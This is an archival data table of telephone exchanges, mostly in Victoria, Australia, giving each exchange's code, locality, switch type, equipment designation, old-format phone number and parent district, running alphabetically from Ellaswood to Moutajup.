ELLA Ellaswood       ARK  ARK-M                    051 52 3067 SALG
ELLE Ellerslie       ARK  ARK-D                    055 93 1067 WBOX
ELMH Elmhurst        ARK  ARK-M                    053 521067  HORX
ELMO Elmore          ARK  ARK-M                    054 43 1067 BGNX
ELPH Elphinstone     ARK  ARK-D                    054 72 1067 BGNX
ELSK Elsternwick     ARE  114                      03 528 1067 WINDSOR
ELTM Eltham          ARE  113                      03 439 1067 IVANHOE
EMLC Emerald MSE     ARF  REG-LP REMO              059 683067  DANDENONG
EMLD Emerald         ARF  REG-LP REMO              059 68 3067 DANDENONG
ENDS End.Hills Node  AXE  10102/33                 03 704 6399 DANDENONG
ENSA Ensay           ARK  ARK-M                    051 59 1309 SALG
EOPC Edenhope MSE    ARF  REG-LP REMO              055 851067  HMOX
EOPE Edenhope        ARF  REG-LP REMO              055 851067  HMOX
EPPG Epping          ARE  113                      03 404 1067 IVANHOE
EPSO Epsom           AXE  RSS-D                    054 43 1067 BGNX
ERIC Erica           ARK  ARK-D                    051 27 1067 MWRX
EURA Euroa           ARK  ARK-M                    057 95 2067 SEYX
EVFD Evansford       SXS  APO-C                    053 370292  BRAX
EVTN Everton         ARK  ARK-D                    057 21 6067 WANX
EWOD Elwood          ARE  113                      03 531 1067 WINDSOR
EWOF Elwood SXS Tad  SXS  2000                     03 531 1067 WINDSOR
EXCC Exhib'n SA STP  AXE  1030210/25               CBD
EXHA Exhb Dig Tandem AXE  1010606/17               03 662 1067 CBD
EXHB Exhib'n  Papas  AXE  1020108/76               03 662 1067 CBD
EXHD Exhibition ACD  AXE			   03 662 1067 CBD
EXHG Exhibition B    AXE  1020208/36               03 662 1067 CBD
EXHI Exhib'n 1 ISDN  AXE  1030210/25               03 662 1067 CBD
EXHN Exhibition A    AXE  1010606/17               03 662 1067 CBD
EXHP Exhib'n AUSPAC  AXE  PACKET SWITCH            03 663 3622 CBD
EXIB Exhib'n 2 ISDN  AXE			   03 662 1067 CBD
EXIP Exhibition I.N. DMS  NORTEL
FBNK Fernbank        ARK  ARK-D                    051 52 3067 BAIX
FENT Fentons Creek   ARK  ARK-M                    054 95 1067 BGNX
FHCK Fish Creek      ARK  ARK-D                    056 82 2067 MWRX
FING Fingal          ARK  ARK-M                    03 784 2254 DROMANA
FKNR Fawkner         ARE  113                      03 359 1067 FOOTSCRAY
FLCK Falls Creek     ARK  ARK-D                    057 55 1067 WANX
FLIN Flinders        ARK  ARK-D                    03 784 2254 DROMANA
FLOW Flowerdale      ARK  ARK-D                    057 82 1067 SEYX
FNLC Finley-NSW      ARF
FOSC Foster MSE      ARF  REG-LP REMO              056 82 2067 MWRX
FOSN Foster North    SXS  APO-C                    056 82 2067 MWRX
FOSR Foster          ARF  REG-LP REMO              056 82 2067 MWRX
FOSX Foster 104      AXE  104                      056 82 2067 MWRX
FREK Freshwater Ck   ARK  ARK-M                    052 431067  GEEX/MOLP
FRNK Ferny Creek     ARK  ARK-D                    03 758 1067 DANDENONG
FRTD Frankston Tand. ARF			   03 784 2410 DANDENONG
FRTF Frankston MSE   ARF  REG-LP PRE REMO          03 784 2410 DANDENONG
FRTN Frankston       ARF  REG-LM                   03 783 1067 DANDENONG
FRTR Frankstn C Node AXE			   03 781 1067 DANDENONG
FRTX Frankston Node  AXE  1030208/77               03 781 1067 DANDENONG
FSRB Footscray B     AXE			   03 689 1067 FOOTSCRAY
FSRX Footscray A     AXE  1020108/76               03 689 1067 FOOTSCRAY
FSRY Footscray       ARE  113                      03 689 1067 FOOTSCRAY
FTGC F'tree G.Tandem ARF			   03 783 1067 DANDENONG
FTGY Ferntree Gully  ARE  113                      03 758 1067 DANDENONG
FTON Flemington      ARF  REG-LP REMO CCR          03 376 1067 FOOTSCRAY
FTOT Flemington SXS  SXS  2000                     03 370 1067 FOOTSCRAY
GAGI Glenmaggie      ARK  ARK-M                    051 47 1067 SALG
GAKE Green Lake      SXS  APO-C                    053 825067  HORX
GALD Greenwald       ARK  ARK-D                    055 231067  HMOX
GALE Gardenvale      ARE  111                      03 528 1067 WINDSOR
GALT Gardenvale SXS  SXS  2000                     03 528 1067 WINDSOR
GANN Gannawarra      ARK  ARK-M                    054 52 1067 BGNX
GARF Garfield        ARK  ARK-M                    056 23 5067 WGUX
GARV Garvoc          SXS  APO-C&D                  055 93 1067 WBOX
GARY Glengarry       ARK  ARK-M                    051 74 1067 TAGX
GASS Grassdale       SXS  APO-C                    055 730249  HMOX
GAZE Gazette         SXS  APO-C&D                  055 730249  HMOX
GBRH Greensborough   ARE  113                      03 435 1067 IVANHOE
GBRX Greensbgh Node  AXE  1030208/77               03 435 1067 IVANHOE
GEEB Geelong ARM     ARM  			   052 211067  GEEX/MOLP
GEEC Geelong MSE     ARF  REG-LP PRE REMO          052 211067  GEEX/MOLP
GEEK Greens Creek    ARK  ARK-D                    053 581067  HORX
GEEM Geelong Pivot   ARE  113                      052 211067  GEEX/MOLP
GEER Geelong RSS     AXE  RSS-D                    052 211067  GEEX/MOLP
GEEX Geelong Node    AXE  1030208/77               052 211067  GEEX/MOLP
GELA Gelantipy       ARK  ARK-M                    051 52 3067 BAIX
GELR Gellibrand R    ARK  ARK-D                    052 312067  GEEX/MOLP
GEMB Gembrook        ARK  ARK-M                    059 68 3067 DANDENONG
GENO Genoa           ARK  ARK-M                    051 54 1067 BAIX
GENV Glen Valley     SXS  APO-B                    051 59 1309 BAIX
GERE Grassmere       ARK  ARK-D                    055 62 1067 WBOX
GERG Gerang Gerung   ARK  ARK-D                    053 825067  HORX
GERO Gerogery        SXS  APO-C
GFTA Griffith-NSW    ARM
GISB Gisborne        ARK  ARK-M                    054 22 1067 BGNX
GISX Gisborne Node   AXE  1030208/77               054 282299  BGNX
GLBE Goomalibee      ARK  ARK-D                    057 61 1374 WANX
GLGL Gol Gol 104     AXE  104                      050 23 8729 MILX
GLIS Glen Iris       SXS  2000                     03 885 1067 CAMBERWELL
GLLA Glenisla        SXS  APO-B                    053 825067  HORX
GLLE Glenlee         ARK  ARK-D                    053 911067  HORX
GLON Glenthompson    ARK  ARK-M                    055 730249  HMOX
GLOR Glenorchy       ARK  ARK-D                    053 581067  HORX
GLVA Glenaroua       ARK  ARK-M                    057 92 1067 SEYX
GNAR Gnarwarre       ARK  ARK-M                    052 431067  GEEX/MOLP
GNRY Glenroy         ARE  113                      03 306 1067 FOOTSCRAY
GNYA Granya          ARK  ARK-D
GOBH Golden Beach    ARK  ARK-M                    051 44 2067 SALG
GONN Goon Nure       ARK  ARK-M                    051 52 3067 BAIX
GOOG Goongerah       ARK  RCEE                     051 54 1067 BAIX
GOOR Goornong        ARK  ARK-M                    054 43 1067 BGNX
GORK Goroke          ARK  ARK-M                    053 825067  HORX
GORM Gormandale      SXS  APO-C                    051 74 1067 TAGX
GORW Gorae West      ARK  ARK-D                    055 231067  HMOX
GORX Gordon 104      AXE  104                      053 672067  BRAX
GOWE Gowar East      ARK  ARK-D                    054 95 1067 BGNX
GRBT Goorambat       ARK  ARK-M                    057 61 1374 WANX
GRGE Girgarre        ARK  ARK-M                    058 52 1067 SHPX
GRGR Gre Gre         ARK  ARK-D                    054 95 1067 BGNX
GRIN Gringegalgona   ARK  ARK-M                    055 73 0249 HMOX
GRLE Greenvale       AXE  RSS-D                    03 338 1067 FOOTSCRAY
GROX Grovedale RSS   AXE  RSS-D                    052 43 1067 GEEX/MOLP
GRTA Greta           ARK  ARK-D                    057 21 6067 WANX
GRTN Graytown        ARK  ARK-D                    057 92 1067 SEYX
GRTV Grantville 104  AXE  AXE-104                  056 72 1067 MWRX
GRUY Gruyere         ARK  ARK-M                    03 735 1067 CAMBERWELL
GRWN Glenrowan       ARK  ARK-D                    057 21 6067 WANX
GSDE Gladysdale      ARK  ARK-D                    03 735 1067 CAMBERWELL
GSFT Grass Flat      SXS  APO-C                    053 825067  HORX
GUID Guildford       ARK  ARK-D                    054 72 1067 BGNX
GULU Townsville CMTS AXE
GUNR Gunbower        ARK  ARK-M                    054 82 1067 BGNX
GVIL Grenville       SXS  APO-C                    053 370294  BRAX
GWES Great Western   ARK  ARK-D                    053 581067  HORX
GYMB Gymbowen        SXS  APO-C                    053 825067  HORX
GYON Glenlyon        ARK  ARK-D                    053 482067  BRAX
GYWN Garryowen       ARK  ARK-D
HADD Haddon          ARK  ARK-M                    053 370292  BRAX
HALA Hallam          ARF  REG-LP REMO CCR          03 704 6399 DANDENONG
HALS Hallston        SXS  APO-C                    056 68 5211 MWRX
HARC Harcourt        ARK  ARK-D                    054 72 1067 BGNX
HARK Hensley Park    SXS  APO-C&D                  055 730249  HMOX
HARO Harrow          ARK  ARK-M                    055 85 1067 HMOX
HAST Hastings        ARE  114                      03 784 2298 DROMANA
HAWK Hawkesdale      ARK  ARK-D                    055 62 1067 WBOX
HAWN Hawthorn        SXS  2000                     03 818 1067 BOX HILL
HAWS Hawthorn Tandem ARF			   03 818 1067 BOX HILL
HAWT Hawthorn L11    ARF			   03 818 1067 BOX HILL
HAWX Hawthorn Node   AXE  1010606/17               03 818 1067 BOX HILL
HCFT Homecroft       SXS  APO-C                    053 981067  HORX
HDBG Heidelberg      ARF  REG-LM                   03 457 1067 IVANHOE
HEAH Heathmere       ARK  ARK-D                    055 231067  HMOX
HEAT Heathcote       ARK  ARK-M                    054 43 1067 BGNX
HEDE Hedley          ARK  ARK-D                    051 82 1067 MWRX
HESK Hesket          ARK  ARK-M                    054 22 1067 BGNX
HETH Heatherton      ARE  113                      03 551 1067 WINDSOR
HETN Hopetoun        ARK  ARK-M                    050 70 1067 SWIX
HEXM Hexham          ARK  ARK-D                    055 93 1067 WBOX
HEYD Heywood         ARK  ARK-M                    055 231067  HMOX
HEYF Heyfield        ARK  ARK-M                    051 47 1067 SALG
HEYX Heyfield 104    AXE  104                      051 471067  SALG
HFLD Hopefield       ARK  ARK-D
HGTS Highett Y Stage ARF			   03 555 1067 WINDSOR
HGTT Highett         ARE  113                      03 555 1067 WINDSOR
HGTX Highett A Node  AXE			   03 555 1067 WINDSOR
HILD Hill End        SXS  APO-C                    056 33 1067 WGUX
HMHS Hotham Heights  ARK  ARK-M                    057 55 1067 WANX
HMKE Sydney 1 DMSC   AXE
HMKF Haymarket DMSC  AXE
HMKS Sydney 2 DMSC   AXE
HMOB Hamilton ARM    ARM			   055 730249  HMOX
HMOC Hamilton MSE    ARF  REG-LP PRE REMO          055 730249  HMOX
HMON Hamilton        ARF  REG-LP PRE REMO          055 732049  HMOX
HMOX Hamilton Node   AXE  1030208/36               055 730249  HMOX
HODD Hoddles Creek   ARK  ARK-D                    03 7351067 CAMBERWELL
HOLB Holbrook        ARF
HOLC Holbrook MSE    ARF
HOMS Hobart CMTS     AXE
HOPV Hopevale        ARK  ARK-D                    050 70 1067 SWIX
HORC Horsham MSE     ARF  REG-LP PRE REMO          053 825067  HORX
HORD Hordern Vale    ARK  ARK-M                    052 376206  GEEX/MOLP
HORF Horfield        ARK  ARK-M                    054 52 1067 BGNX
HORM Horsham         ARF  REG-LP PRE REMO          053 825067  HORX
HORX Horsham Node    AXE  1030208/77               053 825067  HORX
HOTS Hotspur         AXE  RCM                      055 730249  HMOX
HOWL Howlong         ARK  ARK-D
HSGP Halls Gap       ARK  ARK-D                    053 581067  HORX
HSTN Harston         ARK  ARK-D                    058 52 1067 SHPX
HSTX Hastings 104    AXE  104                      059 79 1067 DROMANA
HTCA Hobart          10C
HTLL Hartwell        ARF  REG-LP REMO CCR          03 809 1067 CAMBERWELL
HUNY Huntly          ARK  ARK-M                    054 43 1067 BGNX
HURB Hurstbridge     ARF  REG-LM                   03 718 1067 IVANHOE
HVIC Healesville MSE ARF  REG-LP REMO              059 62 4111 CAMBERWELL
HVIL Healesville     ARF  REG-LP REMO              059 62 4067 CAMBERWELL
HYLE Harrietville    ARK  ARK-D                    057 55 1067 WANX
HZWD Hazelwood North ARK  ARK-M                    051 34 1067 MWRX
ICYK Icy Creek       ARK  ARK-D                    056 23 5067 WGUX
IGON Invergordon     ARK  ARK-D                    058 62 1067 SHPX
ILLO Illowa          ARK  ARK-D                    055 62 1067 WBOX
INDV Indigo Valley   ARK  ARK-D
INLO Inverloch       ARK  ARK-M                    056 72 1067 MWRX
INVR Inverleigh      ARK  ARK-D                    052 312067  GEEX/MOLP
INWD Inglewood       ARK  ARK-M                    054 43 1067 BGNX
IREW Irrewillipe     ARK  ARK-D                    052 312067  GEEX/MOLP
IRRE Irrewarra       ARK  ARK-M                    052 312067  GEEX/MOLP
IRYL Irymple No 2    ARK  ARK-M                    050 238 729 MILX
IRYX Irymple RSS     AXE  RSS-D                    050 23 8738 MILX
IVAN Ivanhoe         AXE  RSS-D                    03 49 1067  IVANHOE
JANC Jancourt        ARK  ARK-D                    055 93 1067 WBOX
JARK Jarklin         ARK  ARK-M                    054 43 1067 BGNX
JCKR Jack River      ARK  ARK-D                    051 82 5067 MWRX
JDRA Jindera         AXE  RSS-D
JDVK Jindivick       ARK  ARK-D                    056 23 5067 WGUX
JEPA Jeparit         ARK  ARK-M                    053 981067  HORX
JMSN Jamieson        ARK  ARK-D                    057 75 2067 SEYX
JOHA Johanna         ARK  ARK-M                    052 376206  GEEX/MOLP
JRTN Junortoun       ARK  ARK-M                    054 43 1067 BGNX
JVLE Jordanville     ARE  113                      03 807 1067 CAMBERWELL
KADN Kadnook         SXS  APO-C                    055 85 1067 HMOX
KAKE Kinglake        ARK  ARK-D                    057 82 1067 SEYX
KAKW Kinglake West   ARK  ARK-D                    057 82 1067 SEYX
KALG Karingal        ARE  113                      03 784 2314 DANDENONG
KALK Kalkee          SXS  APO-C                    053 825067  HORX
KAMA Kamarooka       ARK  ARK-M                    054 43 1067 BGNX
KANI Kaniva          ARK  ARK-M                    053 911067  HORX
KARA Karawinna       ARK  ARK-D                    050 23 8729 MILX
KARI Kariah          ARK  ARK-M                    055 93 1067 WBOX
KATM Katamatite      ARK  ARK-M                    058 62 1067 SHPX
KATW Katandra West   ARK  ARK-D                    058 21 2067 SHPX
KATY Katyil          SXS  APO-C                    053 825067  HORX
KBOL Kimbolton       ARK  ARK-M                    054 43 1067 BGNX
KENK Kennedys Creek  ARK  ARK-D                    052 31 2067 GEEX/MOLP
KENM Kenmare         ARK  ARK-M                    053 981067  HORX
KERA Kerang          ARF  REG-LP PRE REMO          054 52 1067 BGNX
KERB Kerang MSE      ARF  REG-LP PRE REMO          054 52 1067 BGNX
KERS Kerrisdale      ARK  ARK-D                    057 92 1067 SEYX
KERX Kerang 104      AXE  104                      054 52 1067 BGNX
KEWA Kiewa           ARK  ARK-D
KEWE Kew             ARF  REG-LP REMO CCR          03 861 8067 BOX HILL
KEYS Keysborough     ARE  113                      03 797 9424 DANDENONG
KGRO Kangaroo Flat   ARF  REG-LP REMO CCR          054 43 1067 BGNX
KGRX Kang Flat RSS   AXE  RSS                      054 43 1067 BGNX
KGVY King Valley     SXS  APO-C                    057 21 6067 WANX
KGYH Kergunyah       ARK  ARK-D
KHAN Khancoban       ARK  ARK-D
KIAE Kialla East     ARK  ARK-D                    058 21 2067 SHPX
KIAL Kialla          ARK  ARK-M                    058 21 2067 SHPX
KILA Killarney       ARK  ARK-D                    055 62 1067 WBOX
KILF Kilmore MSE     ARF  REG-LP PRE REMO          057 82 1067 SEYX
KILM Kilmore         ARF  REG-LP PRE REMO          057 82 1067 SEYX
KILX Kilmore 104     AXE  104                      057 82 1067 WANX
KKLO Kalkallo        ARK  ARK-M                    03 359 1067 FOOTSCRAY
KLMY Kilmany         ARK  ARK-M                    051 44 2067 SALG
KLOR Keilor          ARE  113                      03 338 1067 FOOTSCRAY
KMAN Koorooman       SXS  APO-C                    056 64 9211 MWRX
KNOW Knowsley        SXS  APO-C                    054 43 1067 BGNX
KNOX Knoxfield       AXE  RSS-D                    03 836 1067 CAMBERWELL
KNWA Koonwarra       ARK  ARK-D                    056 64 2299 MWRX
KOBY Kobyboyn        ARK  ARK-M                    057 92 1067 SEYX
KOLO Kolora          ARK  ARK-D                    055 93 1067 WBOX
KONG Konongwootong   SXS  APO-C&D                  055 73 0249 HMOX
KORT Koroit          ARK  ARK-D                    055 62 1067 WBOX
KOTU Kotupna         ARK  ARK-M                    058 62 1067 SHPX
KOYU Koyuga          ARK  ARK-D                    058 52 1067 SHPX
KRBA Korumburra      ARF  REG-LP PRE REMO          056 55 1067 MWRX
KRBC Korumburra MSE  ARF  REG-LP PRE REMO          056 55 1067 MWRX
KRBX Korumburra Node AXE  1030208/77               056 55 1067 MWRX
KRLG Koorlong        ARK  ARK-M                    050 23 8729 MILX
KROD Kangaroo Ground AXE  104                      03 718 1067 IVANHOE
KROW Krowera         ARK  ARK-D                    056 55 1067 MWRX
KRVE Korong Vale     ARK  ARK-M                    054 95 1067 BGNX
KTNG Koetong         ARK  ARK-D
KUGA Katunga         ARK  ARK-D                    058 62 1067 SHPX
KWAK Kongwak         SXS  APO-C                    056 55 1067 MWRX
KWRA Killawarra      ARK  ARK-D                    057 21 6067 WANX
KWRP Koo Wee Rup     AXE  104                      059 41 1067 DANDENONG
KYAB Kyabram         ARF  REG-LP REMO              058 52 1067 SHPX
KYAC Kyabram MSE     ARF  REG-LP REMO              058 52 1067 SHPX
KYAL Kyalite         ARK  ARK-M                    050 324567  SWIX
KYNC Kyneton MSE     ARF  REG-LP PRE REMO          054 22 1067 BGNX
KYNE Kyneton         ARF  REG-LP PRE REMO          054 22 1067 BGNX
KYNG Kooyong         AXE  RSS-D                    03 822 1067 CAMBERWELL
LAAN Laanecoorie     ARK  ARK-M                    054 43 1067 BGNX
LABE Labertouche     ARK  ARK-M                    056 23 5067 WGUX
LAEN Laen            ARK  ARK-M                    054 95 1067 BGNX
LALB Lalbert         ARK  ARK-D                    054 52 1067 BGNX
LALY Lalalty         SXS  APO-C                    058 72 1067 SHPX
LAMN Laharum North   SXS  APO-C                    053 825067  HORX
LANF Lancefield      ARK  ARK-M                    054 22 1067 BGNX
LANK Lance Creek     SXS  APO-C                    056 72 1067 MWRX
LANY Langley         ARK  ARK-M                    054 22 1067 BGNX
LARA Lara            AXE  RSS-D                    052 78 1067 GEEX/MOLP
LARD Lalbert Road    SXS  APO-C                    050 324567  SWIX
LARM Laharum         SXS  APO-C                    053 825067  HORX
LARR Larralea        SXS  APO-C&D                  055 93 1067 WBOX
LASC Lascelles       ARK  ARK-M                    050 70 1067 SWIX
LAVL Lavers Hill     ARK  ARK-M                    052 31 2067 GEEX/MOLP
LAVN Lavington       ARF
LBGA Lake Boga       ARK  ARK-D                    050 324567  SWIX
LBGE Lethbridge      ARK  ARK-D                    052 78 1067 GEEX/MOLP
LBOC Lake Bolac      ARK  ARK-M                    053 521067  HORX
LBRH Landsborough    ARK  ARK-D                    053 581067  HORX
LCTP Leicester Park  SXS  APO-C
LEGN Leongatha North SXS  APO-C                    056 68 6211 MWRX
LEGS Leongatha South ARK  ARK-D                    056 64 3299 MWRX
LEIT Leitchville     ARK  ARK-M                    054 52 1067 BGNX
LEMN Lemnos          ARK  ARK-D                    058 21 2067 SHPX
LEOC Leongatha MSE   ARF  REG-LP PRE REMO          056 62 4067 MWRX
LEOG Leongatha       ARF  REG-LP PRE REMO          056 62 4067 MWRX
LEOP Leopold         AXE  RSS-D                    052 21 1067 GEEX/MOLP
LEOR Leslie Manor    ARK  ARK-D                    055 93 1067 WBOX
LEOX Leongatha 104-1 AXE  104                      056 62 4067 MWRX
LEOY Leongatha 104-2 AXE  104                      056 624067  MWRX
LETX Lakes Ent.104-1 AXE  104                      051 52 3067 SALG
LETY Lakes Ent.104-2 AXE  104                      051 52 3067 SALG
LEXN Lexton          ARK  ARK-M                    054 61 1067 BGNX
LGLG Lang Lang       ARK  ARK-M                    059 41 1067 DANDENONG
LICA Licola          ARF  RCEE                     051 47 1067 SALG
LILF Lilydale MSE    ARF  REG-LP PRE REMO          03 735 1067 CAMBERWELL
LILY Lilydale        ARE  113                      03 735 1067 CAMBERWELL
LINT Linton          ARK  ARK-D                    053 370294  BRAX
LINW Lindenow        ARK  ARK-D                    051 52 3067 BAIX
LITB Little Bilabong SXS  APO-C
LITC Litchfield      ARK  ARK-M                    054 95 1067 BGNX
LITL Little River    AXE  104                      052 78 1067 GEEX/MOLP
LKML Lake Marmal     ARK  ARK-M                    054 95 1067 BGNX
LKRN Lake Rowan      ARK  ARK-D                    057 44 3067 WANX
LKTN lockington      ARK  ARK-M                    054 82 1067 BGNX
LLAN Llanelly        ARK  ARK-D                    054 43 1067 BGNX
LMER Lake Meran      ARK  ARK-M                    054 55 1067 BGNX
LMTH Learmonth       ARK  ARK-D                    053 370292  BRAX
LNCA Launceston      10C
LNDS Leonards Hill   SXS  APO-C                    053 482067  BRAX
LNGE Launching Place AXE  104                      03 735 1067 CAMBERWELL
LNOR Lower Norton    SXS  APO-C                    053 825067  HORX
LOCC Lonsdale SA STP AXE  1020210/72               CBD
LOCD Lockwood        ARK  ARK-D                    054 43 1067 BGNX
LOCH Loch            ARK  ARK-M                    056 55 1067 MWRX
LOGN Logan           ARK  ARK-M                    054 95 1067 BGNX
LONA Lons.Own Tandem ARF  REG-LP PRE REMO          03 602 1067 CBD
LONB Lonsdale L11    ARF			   03 602 1067 CBD
LONE Lonsdale A Node AXE  1030208/77               03 602 1067 CBD
LONH Lonsdale Cent Y ARF			   03 602 1067 CBD
LONM Lonsdale B Node AXE  1030208/77               03 602 1067 CBD
LONS Lonsdale ARF    ARE  114                      03 602 1067 CBD
LONU Lonsdale C Node AXE  1020208/36               03 602 1067 CBD
LONX Lonsdale 000    AXE
LOOD Longwood        ARK  ARK-M                    057 95 2067 SEYX
LOOP Langkoop        SXS  APO-C&D                  055 85 1067 HMOX
LOPS Lonsdale Papas  AXE  1020108/76               CBD
LORD Longford        ARK  ARK-D                    051 44 2067 SALG
LORN Lorne           ARK  ARK-D                    052 89 1206 GEEX/MOLP
LORQ Lorquon         ARK  ARK-D                    053 911067  HORX
LORX Lorne 104       AXE  104                      052 891 067 GEEX/MOLP
LORY Longwarry       ARK  ARK-M                    056 23 5067 WGUX
LOSP Lonsdale I.N.   DMS  NORTEL
LOWE Lowesdale       ARK  ARK-D
LSPT Loch Sport      ARK  ARK-D                    051 44 2067 SALG
LSRE Lismore         ARK  ARK-D                    055 93 1067 WBOX
LTVN Laverton        ARF  REG-LP REMO CCR          03 369 1067 FOOTSCRAY
LUBE Lubeck          ARK  ARK-M                    053 581067  HORX
LUND Lake Mundi      SXS  APO-C&D                  055 81 1067 HMOX
LVSX Laverton South  AXE  RSS-D                    03 688 9474 FOOTSCRAY
LYFD Lysterfield RSS AXE  RSS-D                    03 758 1067 DANDENONG
LYNH Lyndhurst       AXE  10102/30                 03 704 6399 DANDENONG
MACO Macorna         ARK  ARK-M                    054 52 1067 BGNX
MAFC Maffra MSE      ARF  REG-LP PRE REMO          051 47 1067 SALG
MAFF Maffra          ARF  REG-LP PRE REMO          051 47 1067 SALG
MAID Maiden Gully    ARK  ARK-M                    054 43 1067 BGNX
MAIR Main Ridge      ARK  ARK-M                    03 784 2254 DROMANA
MAJO Majorca         ARK  ARK-M                    054 61 1067 BGNX
MALD Maldon          ARK  ARK-D                    054 72 1067 BGNX
MALM Malmsbury 104   AXE  104                      054 22 1067 BGNX
MALS Malvern SXS Tad SXS  2000                     03 509 1067 WINDSOR
MALV Malvern         ARE  113                      03 509 1067 WINDSOR
MAMA Mitta Mitta     ARK  ARK-D
MANN Mannibdar       SXS  APO-C                    053 370294  BRAX
MANT Manangatang     ARK  ARK-M                    050 26 3939 SWIX
MAPK Mena Park       SXS  APO-C                    053 521067  BRAX
MARD Mardan          SXS  APO-C                    056 64 1211 MWRX
MARG Marong          ARK  ARK-D                    054 52 1067 BGNX
MARL Marlo           ARK  ARK-M                    051 54 1067 BAIX
MARN Marnoo          ARK  ARK-M                    053 581067  HORX
MARS Marysville 104  AXE  104                      03 735 1067 CAMBERWELL
MARX Maryborough MSE ARF  REG-LP PRE REMO          056 61 1067 BGNX
MARY Maryborough     ARF  REG-LP PRE REMO          054 61 1067 BGNX
MASB Melb Ambul Serv AXE  BOX HILL
MAUD Maude           ARK  ARK-D                    052 78 1067 GEEX/MOLP
MAUR Macarthur       ARK  ARK-D                    055 730249  HMOX
MAYT Perth           AXE
MAYX Perth 4         AXE
MBEL Moonambel       ARK  ARK-M                    054 61 1067 BGNX
MBEX Mt.Beauty 104   AXE  104                      057 55 1067 WANX
MBIT Murrabit        ARK  ARK-D                    054 52 1067 BGNX
MCEV McEvoys         SXS  APO-C                    054 82 1067 BGNX
MCLX Mt Clear        AXE  RSS                      053 37 0294 BRAX
MCRK Mountain Creek  ARK  ARK-D
MCTA Mallacoa        ARK  ARK-M                    051 54 1067 BAIX
MDRR Mundarra        ARK  RCEE                     055 85 1067 HMOX
MDST Maidstone       ARF  REG-LM                   03 318 1067 FOOTSCRAY
MEER Meerlieu        ARK  ARK-M                    051 54 1067 BAIX
MELA Melbourne 1     ARM			   03 602 1744 CBD
MELB Melbourne 2     ARM			   03 602 1744 CBD
MELC Melbourne 3     10C			   03 605 6601 CBD
MELE Melbourne 4     10C			   03 526 1245 WINDSOR
MELK Exhibition AXB  AXE  AXB TELEX                03 663 6685 CBD
MELQ Melbourne 5     AXE  1020108/76               03 663 1653 CBD
MELU Melbourne 6     AXE  1020108/76               03 526 1255 WINDSOR
MELX Melbourne 7     AXE  1030108/76               03 657 4383 BOX HILL
MEOL Mellool         SXS  APO-C                    050 324567  SWIX
MEPU Mepunga         SXS  APOC&D                   055 62 1067 WBOX
MERB Merbein No 1    ARK  ARK-M                    050 238 729 MILX
MERH Meredith        ARK  ARK-D                    052 78 1067 GEEX/MOLP
MERN Merbein No 2    ARK  ARK-M                    050 238 729 MILX
MERR Merran          ARK  ARK-D                    054 53 2298 BGNX
METH Merbein South   ARK  ARK-M                    050 238729  MILX
MEVL Melville Forest ARK  ARK-M                    055 73 0249 HMOX
MFLC Mansfield MSE   ARF  REG-LP PRE REMO          057 75 2067 SEYX
MFLD Mansfield       ARF  REG-LP PRE REMO          057 75 2067 SEYX
MFLX Mansfield 104   AXE  104                      057 752067  WANX
MGGA Mudgegonga      SXS  APO-C                    057 55 1067 WANX
MGRX Mount Gambier   AXE
MGUM Merrigum        ARK  ARK-D                    058 52 1067 SHPX
MGUR Meringur        ARK  ARK-M                    050 23 8729 MILX
MIAA Mia Mia         ARK  ARK-M                    054 22 1067 BGNX
MIBN Mirboo North    AXE  AXE-R                    056 681299  MWRX
MIDH Minhamite       ARK  ARK-D                    055 730249  HMOX
MIDT Middle Tarwin   ARK  ARK-M                    056 63 4211 MWRX
MIEP Miepoll         SXS  APO-C                    057 95 2067 SEYX
MILC Mildura MSE     ARF  REG-LP PRE REMO          050 238729  MILX
MILD Mildura         ARF  REG-LP REMO CCR          050 238729  MILX
MILX Mildura Node    AXE  1030208/77               050 23 8729 MILX
MIMI Minmindie       ARK  ARK-M                    054 52 1067 BGNX
MINE Mininera        SXS  APO-C                    053 521067  HORX
MINI Minimay         ARK  ARK-M                    053 825067  HORX
MINJ Minjah          SXS  APO-C&D                  055 62 1067 WBOX
MINY Minyip          ARK  ARK-M                    053 825067  HORX
MIRB Mirboo          ARK  ARK-M                    056 64 8299 MWRX
MIRN Mirboo North    ARK  ARK-M                    056 68 1299 MWRX
MIRT Mirranatwa      SXS  APO-C&D                  055 730249  HMOX
MITM Mitcham         ARE  113                      03 873 1067 BOX HILL
MITO Mitiamo         ARK  ARK-M                    054 43 1067 BGNX
MITR Mitre           ARK  ARK-M                    053 825067  HORX
MITT Mittyack        ARK  ARK-D                    050 92 1067 MILX
MKCK Macks Creek     ARK  ARK-D                    051 82 5067 MWRX
MKEN Mckenzie Creek  SXS  APO-C                    053 825067  HORX
MLCS Mordialloc Sth  AXE  RSS-D                    03 583 1067 WINDSOR
MLEN Mullengandra    SXS  APO-C
MLLN Mallan          SXS  APO-C                    050 324567  SWIX
MLND Moreland        ARF  REG-LP REMO CCR          03 386 1067 FOOTSCRAY
MLOC Mordialloc Node AXE  1030208/77               03 583 1067 WINDSOR
MLON Melton          ARE  113                      03 366 1067 FOOTSCRAY
MLSX Melton South    AXE  RSS-D                    03 366 1067 FOOTSCRAY
MLWA Milawa          ARK  ARK-M                    057 21 6067 WANX
MMHK McMahons Creek  ARK  ARK-D                    03 735 1067 CAMBERWELL
MNAK Monak           ARK  ARK-M                    050 238729  MILX
MNTM Muntham         ARK  ARK-M                    055 73 0249 HMOX
MNYN Meeniyan        ARK  ARK-D                    056 64 7299 MWRX
MNYX Meeniyan        AXE  104                      056 64 7299 MWRX
MOCK Mockinya        SXS  APO-C                    053 825067  HORX
MOEE Moe             ARF  REG-LP REMO CCR          051 27 1067 MWRX
MOEX Moe             AXE  RSS-D                    051 271 067 MWRX
MOIR Moira           ARK  ARK-M                    054 82 1067 BGNX
MOLE Molesworth      ARK  ARK-D                    057 92 1067 SEYX
MOLI Moliagul        SXS  ARK-M                    054 61 1067 BGNX
MOLP Moolap Node     AXE  1030208/77               052 21 1067 GEEX/MOLP
MONB Monbulk         AXE  RSS-D                    03 758 1067 DANDENONG
MOOB Moorabool       ARK  ARK-D                    052 781067  GEEX/MOLP
MOOD Moorooduc       AXE  104                      03 784 2353 DROMANA
MOOP Mooroopna       ARF  REG-LP REMO CCR          058 21 2067 SHPX
MOPX Mooroopna RSS   AXE  RSS-D                    058 21 2067 SHPX
MORI Moriac          ARK  ARK-D                    052 312067  GEEX/MOLP
MORK Mooroolbark     ARE  113                      03 726 6067 CAMBERWELL
MORN Mornington      ARE  113                      03 784 2353 DROMANA
MORV Morven          SXS  APO-C
MORY Moriac 104      AXE  104                      052 224400  GEEX/MOLP
MOUT Moutajup        ARK  ARK-D                    055 730249  HMOX
